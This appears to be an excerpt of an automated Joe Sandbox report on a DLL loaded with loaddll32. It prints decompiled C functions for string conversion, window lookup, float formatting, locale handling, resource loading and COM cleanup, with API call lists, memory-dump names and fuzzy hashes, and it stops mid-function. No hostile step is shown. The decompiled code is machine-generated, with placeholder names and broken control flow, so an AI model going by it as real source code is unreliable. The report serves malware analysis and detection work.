Instruction Fuzzy Hash: 0301E93600191ABBEF13AF908C05E9F3B65EF493D0F018114FA1055065C736CA61EFA1

Uniqueness

Uniqueness Score: -1.00%

Function 10010AF2 Relevance: 6.0, APIs: 4, Instructions: 48
memoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E10010AF2(short* _a4) {
				char* _v0;
				int _v8;
				int _v16;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				int _t6;
				char* _t7;
				void* _t12;
				char* _t13;
				void* _t15;
				void* _t16;
				short* _t20;

				_t20 = _a4;
				if(_t20 != 0) {
					__imp__#7(_t20, _t16, _t12);
					_v8 = _t6;
					_t7 = WideCharToMultiByte(0, 0, _t20, _t6, 0, 0, 0, 0);
					_v0 = _t7;
					__imp__#150(0, _t7);
					_t13 = _t7;
					__eflags = _t13;
					if(__eflags == 0) {
						E10004E3A(_t13, _t15, WideCharToMultiByte, 0, __eflags);
					}
					WideCharToMultiByte(0, 0, _t20, _v16, _t13, _v8, 0, 0);
					return _t13;
				}
				return 0;
			}

0x10010af4
0x10010afd
0x10010b06
0x10010b1a
0x10010b1e
0x10010b22
0x10010b26
0x10010b2c
0x10010b2e
0x10010b30
0x10010b32
0x10010b32
0x10010b45
0x00000000
0x10010b4a
0x00000000

APIs

SysStringLen.OLEAUT32(?), ref: 10010B06
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,0000000C,1001D033,00000000,00000018,1001D379), ref: 10010B1E
SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 10010B26
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000,?,?,0000000C,1001D033,00000000,00000018,1001D379), ref: 10010B45

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: Byte$CharMultiStringWide$Alloc
String ID:
API String ID: 3384502665-0
Opcode ID: 2aaaeee83b87f37a7c2fa2b797ecf6177c1475c8e7f20f5b86dc05104e7f5898
Instruction ID: c024efa3420e83baabe874ecab196389fa921329a1610a927b319e642033d1fa
Opcode Fuzzy Hash: 2aaaeee83b87f37a7c2fa2b797ecf6177c1475c8e7f20f5b86dc05104e7f5898
Instruction Fuzzy Hash: BCF0127120A2747FD2225B668C8CC9BBF9CFF8A2E97124529F58996101D6759900C6F1

Uniqueness

Uniqueness Score: -1.00%

Function 1000ABDB Relevance: 6.0, APIs: 4, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E1000ABDB(void* __ebx, void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t9;
				struct HWND__* _t10;
				void* _t14;
				void* _t15;
				struct HWND__* _t16;
				struct HWND__* _t17;
				void* _t18;

				_t14 = __ecx;
				_t13 = __ebx;
				_t9 = GetDlgItem(_a4, _a8);
				_t15 = GetTopWindow;
				_t16 = _t9;
				if(_t16 == 0) {
					L6:
					_t10 = GetTopWindow(_a4);
					while(1) {
						_t17 = _t10;
						__eflags = _t17;
						if(_t17 == 0) {
							goto L10;
						}
						_t10 = E1000ABDB(_t13, _t14, _t17, _a8, _a12);
						__eflags = _t10;
						if(_t10 == 0) {
							_t10 = GetWindow(_t17, 2);
							continue;
						}
						goto L10;
					}
				} else {
					if(GetTopWindow(_t16) == 0) {
						L3:
						_push(_t16);
						if(_a12 == 0) {
							return E1000A8F0(_t13, _t14, _t18);
						}
						_t10 = E1000A917(_t14, _t15, _t16, __eflags);
						__eflags = _t10;
						if(_t10 == 0) {
							goto L6;
						}
					} else {
						_t10 = E1000ABDB(__ebx, _t14, _t16, _a8, _a12);
						if(_t10 == 0) {
							goto L3;
						}
					}
				}
				L10:
				return _t10;
			}

0x1000abdb
0x1000abdb
0x1000abe6
0x1000abec
0x1000abf2
0x1000abf6
0x1000ac26
0x1000ac29
0x1000ac46
0x1000ac46
0x1000ac48
0x1000ac4a
0x00000000
0x00000000
0x1000ac34
0x1000ac39
0x1000ac3b
0x1000ac40
0x00000000
0x1000ac40
0x00000000
0x1000ac3b
0x1000abf8
0x1000abfd
0x1000ac0f
0x1000ac13
0x1000ac14
0x00000000
0x1000ac16
0x1000ac1d
0x1000ac22
0x1000ac24
0x00000000
0x00000000
0x1000abff
0x1000ac06
0x1000ac0d
0x00000000
0x00000000
0x1000ac0d
0x1000abfd
0x1000ac4f
0x1000ac4f

APIs

GetDlgItem.USER32 ref: 1000ABE6
GetTopWindow.USER32(00000000), ref: 1000ABF9

Part of subcall function 1000ABDB: GetWindow.USER32(00000000,00000002), ref: 1000AC40

GetTopWindow.USER32(?), ref: 1000AC29

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: Window$Item
String ID:
API String ID: 369458955-0
Opcode ID: ce071e9538a02d42f810a6b21320928da7b329cf863030978907d6d72f575913
Instruction ID: cd43aa0fe87982c1d24f281b623a533cfa4df9f459eb7cb89b98fbb4107c1cf3
Opcode Fuzzy Hash: ce071e9538a02d42f810a6b21320928da7b329cf863030978907d6d72f575913
Instruction Fuzzy Hash: F7016236501666ABFB239F518D00E8F3A99EF0B3E0F038220FD005612AE731D9D19AE5

Uniqueness

Uniqueness Score: -1.00%

Function 1002BCC5 Relevance: 6.0, APIs: 4, Instructions: 48
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E1002BCC5(void* __ebx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;
				void* _t28;
				void* _t29;

				_t28 = __ebx;
				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E1002B5C2(_t29, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t35 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E1002B6AE(_t28, _t29, _a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E1002BBCD(_t29, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E1002BB14(_t29, _t35, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}

0x1002bcc5
0x1002bcc8
0x1002bcce
0x1002bd41
0x00000000
0x1002bcd5
0x1002bcd5
0x1002bcd8
0x1002bcf3
0x1002bcf6
0x1002bd16
0x1002bd28
0x1002bcf8
0x1002bcf8
0x1002bcfb
0x00000000
0x1002bcfd
0x1002bd0f
0x1002bd0f
0x1002bcfb
0x1002bd46
0x1002bd4a
0x1002bcda
0x1002bcf2
0x1002bcf2
0x1002bcd8

APIs

__cftof_l.LIBCMT ref: 1002BCE9

Part of subcall function 1002BB14: __fltout2.LIBCMT ref: 1002BB3E

__cftog_l.LIBCMT ref: 1002BD0F
__cftoe_l.LIBCMT ref: 1002BD41

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
Instruction ID: 3b922080ff75e98142c472849b9f5e6d9f0d2bf6741c52107cc94376e2c1784d
Opcode Fuzzy Hash: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
Instruction Fuzzy Hash: C9014B3680058EBBCF129E84EC418EE3F62FF19390F948455FE1959031D736D9B1AB81

Uniqueness

Uniqueness Score: -1.00%

Function 10029AD3 Relevance: 6.0, APIs: 4, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 89%

			E10029AD3(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x10041648);
				E10022714(__ebx, __edi, __esi);
				_t31 = E10025E70(__edx, __edi, _t35);
				_t15 =  *0x100461fc; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E10023FE8(0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x10046100; // 0x3011300
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x10045cd8;
								if(__eflags != 0) {
									_push(_t33);
									E1001F6F4(_t25, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x10046100; // 0x3011300
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x10046100; // 0x3011300
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E10029B6E();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E10020BB5(_t25, _t29, _t31, 0x20);
				}
				return E10022759(_t33);
			}

0x10029ad3
0x10029ad3
0x10029ad3
0x10029ad3
0x10029ad5
0x10029ada
0x10029ae4
0x10029ae6
0x10029aee
0x10029b0f
0x10029b15
0x10029b19
0x10029b1c
0x10029b1f
0x10029b25
0x10029b27
0x10029b29
0x10029b2c
0x10029b32
0x10029b34
0x10029b36
0x10029b3c
0x10029b3e
0x10029b3f
0x10029b44
0x10029b3c
0x10029b34
0x10029b45
0x10029b4a
0x10029b4d
0x10029b53
0x10029b57
0x10029b57
0x10029b5d
0x10029b64
0x10029af6
0x10029af6
0x10029af6
0x10029afb
0x10029aff
0x10029b04
0x10029b0c

APIs

Part of subcall function 10025E70: __getptd_noexit.LIBCMT ref: 10025E71
Part of subcall function 10025E70: __amsg_exit.LIBCMT ref: 10025E7E

__amsg_exit.LIBCMT ref: 10029AFF
__lock.LIBCMT ref: 10029B0F
InterlockedDecrement.KERNEL32(?), ref: 10029B2C
InterlockedIncrement.KERNEL32(03011300), ref: 10029B57

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock
String ID:
API String ID: 2880340415-0
Opcode ID: 56d065f265e4a70fe3f7ed656445acff29df91b79a35f532556a78a06cb7d754
Instruction ID: 7e2233ef4788b528b7c8923621eb479d41e657301323debbe484897fd832dd33
Opcode Fuzzy Hash: 56d065f265e4a70fe3f7ed656445acff29df91b79a35f532556a78a06cb7d754
Instruction Fuzzy Hash: 8D01D235900721EBDB43DB64B94574EB3A0FF09790F954014E804AB6A2D774BD81DFDA

Uniqueness

Uniqueness Score: -1.00%

Function 1000D4E7 Relevance: 6.0, APIs: 4, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000D4E7(void* __ecx, CHAR* _a4) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HRSRC__* _t8;
				void* _t9;
				void* _t11;
				void* _t14;
				void* _t15;
				void* _t16;
				struct HINSTANCE__* _t17;
				void* _t18;

				_t14 = 0;
				_t11 = 0;
				_t19 = _a4;
				_t18 = __ecx;
				if(_a4 == 0) {
					L4:
					_t16 = E1000D09E(_t11, _t18, _t11);
					if(_t11 != 0 && _t14 != 0) {
						FreeResource(_t14);
					}
					return _t16;
				}
				_t17 =  *(E1000EC09(0, 0, _t15, _t19) + 0xc);
				_t8 = FindResourceA(_t17, _a4, 0xf0);
				if(_t8 == 0) {
					goto L4;
				}
				_t9 = LoadResource(_t17, _t8);
				_t14 = _t9;
				if(_t14 != 0) {
					_t11 = LockResource(_t14);
					goto L4;
				}
				return _t9;
			}

0x1000d4eb
0x1000d4ed
0x1000d4ef
0x1000d4f3
0x1000d4f5
0x1000d52a
0x1000d534
0x1000d536
0x1000d53d
0x1000d53d
0x00000000
0x1000d543
0x1000d4fc
0x1000d509
0x1000d511
0x00000000
0x00000000
0x1000d515
0x1000d51b
0x1000d51f
0x1000d528
0x00000000
0x1000d528
0x1000d549

APIs

FindResourceA.KERNEL32(?,?,000000F0), ref: 1000D509
LoadResource.KERNEL32(?,00000000,?,?,?,?,10007D86,?,?,10004C5C,E155DCA3), ref: 1000D515
LockResource.KERNEL32(00000000,?,?,?,?,10007D86,?,?,10004C5C,E155DCA3), ref: 1000D522
FreeResource.KERNEL32(00000000,?,?,?,?,10007D86,?,?,10004C5C,E155DCA3), ref: 1000D53D

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: 1133495af2977c13901a6b7cbd56f9d23c2d84563ebb759bba2609409a45792e
Instruction ID: 281bcab43dd18555d5c8873d9ecd9dd0d63f565addb1b321d849296a265f2762
Opcode Fuzzy Hash: 1133495af2977c13901a6b7cbd56f9d23c2d84563ebb759bba2609409a45792e
Instruction Fuzzy Hash: B0F09636201A115FF741AF658C8893FB7ACEFC96E6B02403AFD05D2116EE618D058271

Uniqueness

Uniqueness Score: -1.00%

Function 10008219 Relevance: 6.0, APIs: 4, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10008219() {
				intOrPtr _t16;
				struct HWND__* _t19;
				intOrPtr _t23;
				intOrPtr* _t28;
				void* _t29;

				_t28 =  *((intOrPtr*)(_t29 - 0x20));
				_t23 =  *((intOrPtr*)(_t29 - 0x24));
				if( *((intOrPtr*)(_t29 - 0x28)) != 0) {
					E1000EFCE(_t23, 1);
				}
				if( *((intOrPtr*)(_t29 - 0x2c)) != 0) {
					EnableWindow( *(_t29 - 0x14), 1);
				}
				if( *(_t29 - 0x14) != 0) {
					_t19 = GetActiveWindow();
					_t34 = _t19 -  *((intOrPtr*)(_t28 + 0x20));
					if(_t19 ==  *((intOrPtr*)(_t28 + 0x20))) {
						SetActiveWindow( *(_t29 - 0x14));
					}
				}
				 *((intOrPtr*)( *_t28 + 0x60))();
				E10007C2C(_t23, _t28, 0, _t28, _t34);
				if( *((intOrPtr*)(_t28 + 0x58)) != 0) {
					FreeResource( *(_t29 - 0x18));
				}
				_t16 =  *((intOrPtr*)(_t28 + 0x44));
				return E1001FC9C(_t16);
			}

0x10008219
0x1000821c
0x10008224
0x1000822a
0x1000822a
0x10008232
0x10008239
0x10008239
0x10008242
0x10008244
0x1000824a
0x1000824d
0x10008252
0x10008252
0x1000824d
0x1000825c
0x10008261
0x10008269
0x1000826e
0x1000826e
0x10008274
0x1000827c

APIs

EnableWindow.USER32(?,00000001), ref: 10008239
GetActiveWindow.USER32 ref: 10008244
SetActiveWindow.USER32(?,?,00000024,100011BE,00000000,00000120), ref: 10008252
FreeResource.KERNEL32(?,?,00000024,100011BE,00000000,00000120), ref: 1000826E

Part of subcall function 1000EFCE: EnableWindow.USER32(?,000000FF), ref: 1000EFDB

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: Window$ActiveEnable$FreeResource
String ID:
API String ID: 253586258-0
Opcode ID: b350666bfdb60a23390b1ddd49cbda8f00418691cb9fbf53fe745009104ea4cd
Instruction ID: 9d83087e220dd0781b059ca2b134525f77e60f6c7b422949920854a7550f5502
Opcode Fuzzy Hash: b350666bfdb60a23390b1ddd49cbda8f00418691cb9fbf53fe745009104ea4cd
Instruction Fuzzy Hash: A0F03C34900A19CFEF12DB64CD855ADB7F1FF88B81B200528E48276169CB726E40CF21

Uniqueness

Uniqueness Score: -1.00%

Function 1001E221 Relevance: 6.0, APIs: 4, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E1001E221(intOrPtr _a4, intOrPtr _a8) {
				long _t4;
				long _t5;
				void* _t7;
				void* _t8;
				void* _t9;
				void* _t13;

				_t14 = _a4;
				if(_a4 == 0) {
					__eflags =  *0x10048888;
					if( *0x10048888 == 0) {
						_t5 = GetTickCount();
						 *0x10048888 =  *0x10048888 + 1;
						__eflags =  *0x10048888;
						 *0x100453a0 = _t5;
					}
					_t4 = GetTickCount() -  *0x100453a0;
					__eflags = _t4 - 0xea60;
					if(_t4 > 0xea60) {
						__imp__CoFreeUnusedLibraries();
						_t4 = GetTickCount();
						 *0x100453a0 = _t4;
					}
					return _t4;
				}
				return E1001E1CA(_t7, _t8, _t9, _t13, _t14, _a8);
			}

0x1001e221
0x1001e226
0x1001e233
0x1001e241
0x1001e243
0x1001e245
0x1001e245
0x1001e24b
0x1001e24b
0x1001e252
0x1001e258
0x1001e25d
0x1001e25f
0x1001e265
0x1001e267
0x1001e267
0x00000000
0x1001e26c
0x00000000

APIs

GetTickCount.KERNEL32 ref: 1001E243
GetTickCount.KERNEL32 ref: 1001E250
CoFreeUnusedLibraries.OLE32 ref: 1001E25F
GetTickCount.KERNEL32 ref: 1001E265

Part of subcall function 1001E1CA: CoFreeUnusedLibraries.OLE32(00000000,1001E2A9,00000000), ref: 1001E20E
Part of subcall function 1001E1CA: OleUninitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,1001E2A9), ref: 1001E214

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: CountTick$FreeLibrariesUnused$Uninitialize
String ID:
API String ID: 685759847-0
Opcode ID: b989edfafec850737555b4dcdb83f250162968ff4dd316512e162b5f5acc9b84
Instruction ID: 9aa4607869117499f4b65bf9b804208a697730aabcf92e8cb44ab6419cd381d0
Opcode Fuzzy Hash: b989edfafec850737555b4dcdb83f250162968ff4dd316512e162b5f5acc9b84
Instruction Fuzzy Hash: D2E0ED30C04265DEE705EF20CE8464D3AE4FB4A392F914916E441DA161C7749EC0DF55

Uniqueness

Uniqueness Score: -1.00%

Function 1001842E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 170
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E1001842E(intOrPtr* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t103;
				intOrPtr* _t104;
				signed int _t106;
				signed int _t118;
				intOrPtr* _t122;
				signed int _t138;
				signed int _t146;
				void* _t149;
				signed int _t150;
				signed int _t174;
				signed int _t176;
				void* _t177;
				void* _t182;
				signed int _t184;
				void* _t185;
				void* _t187;

				_t186 = __ecx;
				_t146 = 0;
				if( *((intOrPtr*)(__ecx + 0x48)) == 0) {
					__eflags =  *(__ecx + 0x40);
					if( *(__ecx + 0x40) == 0) {
						L9:
						_t149 = 0;
						__eflags =  *((intOrPtr*)(_t186 + 0x10)) - _t146;
						 *(_t186 + 0x38) = _t146;
						if( *((intOrPtr*)(_t186 + 0x10)) <= _t146) {
							L12:
							_t103 =  *(_t186 + 0x38);
							__eflags = _t103 - _t146;
							if(__eflags > 0) {
								_t176 = 0x30;
								_t172 = _t103 * _t176 >> 0x20;
								_t167 =  ~(__eflags > 0) | _t103 * _t176;
								 *((intOrPtr*)(_t186 + 0x3c)) = E10004D4A( ~(__eflags > 0) | _t103 * _t176, _t167);
							}
							__eflags =  *((intOrPtr*)(_t186 + 0x10)) - _t146;
							_v12 = _t146;
							_v16 = _t146;
							if( *((intOrPtr*)(_t186 + 0x10)) <= _t146) {
								L21:
								_t150 =  *(_t186 + 0x38);
								_t104 =  *((intOrPtr*)(_t186 + 8));
								 *((intOrPtr*)( *_t104 + 0x10))(_t104, _t150,  *((intOrPtr*)(_t186 + 0x3c)), _t150 << 4, _t146);
								_t106 =  *(_t186 + 0x38);
								__eflags = _t106 - _t146;
								if(__eflags != 0) {
									_t174 = 0x10;
									_t156 =  ~(__eflags > 0) | _t106 * _t174;
									 *(_t186 + 0x40) = E10004D4A( ~(__eflags > 0) | _t106 * _t174, _t156);
								}
								__eflags =  *(_t186 + 0x38) - _t146;
								if( *(_t186 + 0x38) <= _t146) {
									L26:
									E10017B9D(_t186);
									return  *((intOrPtr*)( *_t186 + 0x10))();
								} else {
									_t182 = 0;
									__eflags = 0;
									do {
										E10020F40(_t182,  *(_t186 + 0x40) + _t182, 0, 0x10);
										 *(_t182 +  *(_t186 + 0x40)) =  *(_t182 +  *(_t186 + 0x40)) & 0x00000000;
										_t187 = _t187 + 0xc;
										_t146 = _t146 + 1;
										_t182 = _t182 + 0x10;
										__eflags = _t146 -  *(_t186 + 0x38);
									} while (_t146 <  *(_t186 + 0x38));
									goto L26;
								}
							} else {
								_v8 = _t146;
								do {
									_t118 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t186 + 0x14)) + _v8 + 0x24)) + 4));
									__eflags = _t118 - _t146;
									_v20 = _t118;
									if(_t118 == _t146) {
										goto L20;
									}
									_t184 = _v12 * 0x30;
									__eflags = _t184;
									do {
										_t122 = E1000911A( &_v20);
										E100157C0(_t172,  *((intOrPtr*)(_t186 + 0x3c)) + _t184,  *((intOrPtr*)(_t186 + 0x14)) + _v8);
										 *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x18) = _v12 << 4;
										 *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x1c) =  *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x1c) & 0x00000000;
										 *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x24) =  *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x24) | 0xffffffff;
										 *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x20) =  *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x20) | 0xffffffff;
										_v12 = _v12 + 1;
										 *((intOrPtr*)(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x28)) = 1;
										 *((intOrPtr*)(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x2c)) =  *((intOrPtr*)( *_t122 + 0xa0));
										_t184 = _t184 + 0x30;
										__eflags = _v20;
									} while (_v20 != 0);
									_t146 = 0;
									__eflags = 0;
									L20:
									_v16 = _v16 + 1;
									_v8 = _v8 + 0x28;
									__eflags = _v16 -  *((intOrPtr*)(_t186 + 0x10));
